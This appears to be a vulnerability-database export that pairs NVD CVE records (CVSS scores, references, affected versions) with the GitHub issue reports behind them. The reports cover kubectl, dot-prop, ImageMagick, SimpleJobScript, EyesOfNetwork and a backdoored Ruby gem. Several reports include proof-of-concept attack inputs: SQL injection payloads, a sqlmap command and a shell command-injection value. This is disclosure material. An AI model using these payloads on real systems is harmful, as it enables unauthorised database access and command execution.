"integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/87773" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-announce/YYtEFdFimZ4/nZnOezZuBgAJ" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/87773" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-announce/YYtEFdFimZ4/nZnOezZuBgAJ" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "8E20ECB8-B503-4DB2-BCDB-D28E53523C9E", "versionEndExcluding": "1.13.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CFCC3601-5C5D-4304-AE8E-E75F262A5CC6", "versionEndExcluding": "1.14.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.14.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A4A079B-AA15-49F4-9861-D99D6FAEE758", "versionEndExcluding": "1.15.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.1-1.12:*:*:*:*:*:*:*", "matchCriteriaId": "DF182631-B804-429A-A1EC-B9BCE60FDA93", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/kubernetes/kubernetes/issues/87773
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered in kubectl versions v1.13.10, v1.14.6, and v1.15.3. The issue is of a medium severity and upgrading of kubectl is encouraged to fix the vulnerability. **Am I vulnerable?** Run kubectl version --client and if it returns versions v1.13.10, v1.14.6, and v1.15.3, you are running a vulnerable version. **How do I upgrade?** Follow installation instructions [here](https://kubernetes.io/docs/tasks/tools/install-kubectl/) **Vulnerability Details** The details for this vulnerability are very similar to CVE-2019-1002101 and CVE-2019-11246. A vulnerability has been discovered in kubectl cp that allows a combination of two symlinks to copy a file outside of its destination directory. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree. This issue is filed as CVE-2019-11251. Two fixes were formulated, one fix to remove symlink support going forwards and a fix with cherry picks made to ensure backwards compatibility. See https://github.com/kubernetes/kubernetes/pull/82143 for the primary fix in v1.16.0 which removes the support of symlinks in kubectl cp. After version 1.16.0, symlink support with kubectl cp is removed, it is recommended instead to use a combination of exec+tar. A second fix has been made to 1.15.4 and backported to 1.14.7 and 1.13.11. This changes the kubectl cp un-tar symlink logic, by unpacking the symlinks after all the regular files have been unpacked. This then guarantees that a file can’t be written through a symlink. See https://github.com/kubernetes/kubernetes/pull/82384 for the fix to version 1.15.4. The following Cherry picks were made from this fix to earlier versions of v1.14.7 and v1.13.11: See https://github.com/kubernetes/kubernetes/pull/82502 for version 1.14.7 See https://github.com/kubernetes/kubernetes/pull/82503 for version 1.13.11 Thank you to Erik Sjölund (@eriksjolund) for discovering this issue, Tim Allclair and Maciej Szulik for both fixes and the patch release managers for including the fix in their releases. /close
CVE-2019-11251: kubectl cp symlink vulnerability
https://api.github.com/repos/kubernetes/kubernetes/issues/87773/comments
3
2020-02-03T15:12:22Z
2022-10-14T02:00:16Z
https://github.com/kubernetes/kubernetes/issues/87773
559,146,411
87,773
1,064
CVE-2020-8116
2020-02-04T20:15:13.353
Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "support@hackerone.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-ff7x-qrg7-qggm" }, { "source": "support@hackerone.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sindresorhus/dot-prop/issues/63" }, { "source": "support@hackerone.com", "tags": [ "Broken Link" ], "url": "https://github.com/sindresorhus/dot-prop/tree/v4" }, { "source": "support@hackerone.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://hackerone.com/reports/719856" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-ff7x-qrg7-qggm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sindresorhus/dot-prop/issues/63" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/sindresorhus/dot-prop/tree/v4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://hackerone.com/reports/719856" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dot-prop_project:dot-prop:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "9EFF2C93-F28E-47DE-A654-0B614FB1D5B8", "versionEndExcluding": "4.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:dot-prop_project:dot-prop:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "F8DD28C3-2237-4DD4-AAB4-455A93029B51", "versionEndExcluding": "5.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/sindresorhus/dot-prop/issues/63
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "sindresorhus", "dot-prop" ]
Based on the severity of [CVE-2020-8116](https://nvd.nist.gov/vuln/detail/CVE-2020-8116) and the fact that 4.x is still very commonly used as a dependency, I would like to kindly request for the [fix](https://github.com/sindresorhus/dot-prop/commit/3039c8c07f6fdaa8b595ec869ae0895686a7a0f2) to be backported to 4.x and released as (presumably) v4.2.1. Would this be possible? Many thanks in advance.
Please backport CVE-2020-8116 security fix to 4.x.
https://api.github.com/repos/sindresorhus/dot-prop/issues/63/comments
9
2020-08-12T09:55:49Z
2020-08-21T22:33:08Z
https://github.com/sindresorhus/dot-prop/issues/63
677,559,188
63
1,065
CVE-2016-7523
2020-02-06T14:15:10.737
coders/meta.c in ImageMagick allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@debian.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/22/2" }, { "source": "security@debian.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420" }, { "source": "security@debian.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1378754" }, { "source": "security@debian.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/22/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1378754" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/94" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "CFC2C780-A54E-4426-9C52-46A20216339E", "versionEndExcluding": "6.9.4-0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/94
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420
heap-buffer-overflow in coders/meta.c:496
https://api.github.com/repos/ImageMagick/ImageMagick/issues/94/comments
2
2016-01-24T01:29:08Z
2016-01-25T00:23:16Z
https://github.com/ImageMagick/ImageMagick/issues/94
128,365,381
94
1,067
CVE-2016-7524
2020-02-06T14:15:10.830
coders/meta.c in ImageMagick allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@debian.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/22/2" }, { "source": "security@debian.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537422" }, { "source": "security@debian.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1378762" }, { "source": "security@debian.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/97c9f438a9b3454d085895f4d1f66389fd22a0fb" }, { "source": "security@debian.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/f8c318d462270b03e77f082e2a3a32867cacd3c6" }, { "source": "security@debian.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/96" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/22/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537422" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1378762" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/97c9f438a9b3454d085895f4d1f66389fd22a0fb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/f8c318d462270b03e77f082e2a3a32867cacd3c6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/96" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "CFC2C780-A54E-4426-9C52-46A20216339E", "versionEndExcluding": "6.9.4-0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/96
[ "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537422
heap-buffer-overflow in coders/meta.c:465
https://api.github.com/repos/ImageMagick/ImageMagick/issues/96/comments
3
2016-01-24T01:29:30Z
2020-02-10T03:00:49Z
https://github.com/ImageMagick/ImageMagick/issues/96
128,365,398
96
1,068
CVE-2020-8645
2020-02-07T00:15:09.443
An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/niteosoft/simplejobscript/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/niteosoft/simplejobscript/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:simplejobscript:simplejobscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD8EF221-6FAC-49F7-9589-168A8294E29A", "versionEndExcluding": null, "versionEndIncluding": "1.66", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/niteosoft/simplejobscript/issues/9
[ "Exploit", "Third Party Advisory" ]
github.com
[ "niteosoft", "simplejobscript" ]
**Description:** An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is `job_id`. The function is `getJobApplicationsByJobId()`. The file is `_lib/class.JobApplication.php`. **Environment:** Version: 1.64 OS: Ubuntu 16.10 Web server: Apache 2.4.18 PHP: 5.6.40 Database: MySQL 5.7.28 URL: `/get_job_applications_ajax.php` Payload: `job_id=493+AND+(SELECT+9069+FROM+(SELECT(SLEEP(5)))Ufmy)` **Steps to Reproduce:** `$ sqlmap --batch --threads=10 --dbms=mysql -u "http://local.simplejobscript.net/get_job_applications_ajax.php" --data="job_id=493" --banner` **PoC:** ![sjs_sqli_jobapplication](https://user-images.githubusercontent.com/5347721/72681395-6a9e1480-3ac3-11ea-95ed-df2eb79a9489.png)
[security] CVE-2020-8645, SQL injection in job applications search function
https://api.github.com/repos/niteosoft/simplejobscript/issues/9/comments
3
2020-01-19T13:01:39Z
2020-02-05T21:57:37Z
https://github.com/niteosoft/simplejobscript/issues/9
551,919,038
9
1,069
CVE-2020-8654
2020-02-07T00:15:09.520
An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS commands via the /module/module_frame/index.php autodiscovery.php target field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/50" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*", "matchCriteriaId": "569CE2B4-B9FF-44FB-8550-FED2DBCFA749", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/EyesOfNetworkCommunity/eonweb/issues/50
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "EyesOfNetworkCommunity", "eonweb" ]
Bonjour, Il est possible d’exécuter des commandes arbitraires sur le système d'exploitation pour un utilisateur d'EON ayant les droits suffisant pour utiliser le module d'AutoDiscovery. Le champ 'Target' n'est pas filtré est il est possible d’exécuter des commandes arbitraires. Voici un exemple de valeur de Target éxécutant la command `id` sur le système: `;id #` Résultat obtenu: ![image](https://user-images.githubusercontent.com/1595901/73845722-8889aa00-4823-11ea-9ba5-ddff71816ec3.png) Ceci a été testé sur une installation de EON 5.3 classique téléchargée à partir du site officiel.
Execution de commandes arbitraires sur le module AutoDiscovery
https://api.github.com/repos/EyesOfNetworkCommunity/eonweb/issues/50/comments
3
2020-02-05T13:27:51Z
2020-03-03T09:51:20Z
https://github.com/EyesOfNetworkCommunity/eonweb/issues/50
560,371,847
50
1,070
CVE-2020-8656
2020-02-07T00:15:09.723
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*", "matchCriteriaId": "569CE2B4-B9FF-44FB-8550-FED2DBCFA749", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/EyesOfNetworkCommunity/eonapi/issues/16
[ "Third Party Advisory" ]
github.com
[ "EyesOfNetworkCommunity", "eonapi" ]
Bonjour, Il est possible de réaliser une injection SQL sur le champ username de la fonction getApiKey. Exemple d'injection de code utilisant la fonction sleep(3): `/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '` Ceci a été testé sur une installation de EON 5.3 classique téléchargée à partir du site officiel. La version reportée de l'API est la 2.4.2 avec l'installation de EON.
Injection SQL sur le champ username de getApiKey
https://api.github.com/repos/EyesOfNetworkCommunity/eonapi/issues/16/comments
4
2020-02-05T13:20:52Z
2020-03-03T10:42:27Z
https://github.com/EyesOfNetworkCommunity/eonapi/issues/16
560,367,803
16
1,071
CVE-2019-17268
2020-02-07T14:15:11.343
The omniauth-weibo-oauth2 gem 0.4.6 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party. Versions through 0.4.5, and 0.5.1 and later, are unaffected.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://diff.coditsu.io/diffs/09a05c37-1b34-49e1-ac94-d4dda40d1ad1#d2h-971595" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://diff.coditsu.io/diffs/09a05c37-1b34-49e1-ac94-d4dda40d1ad1#d2h-971595" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:omniauth-weibo-oauth2_project:omniauth-weibo-oauth2:0.4.6:*:*:*:*:ruby:*:*", "matchCriteriaId": "10A1A9B2-0128-4CA3-99C3-817C91267631", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/beenhero/omniauth-weibo-oauth2/issues/36
[ "Patch", "Third Party Advisory" ]
github.com
[ "beenhero", "omniauth-weibo-oauth2" ]
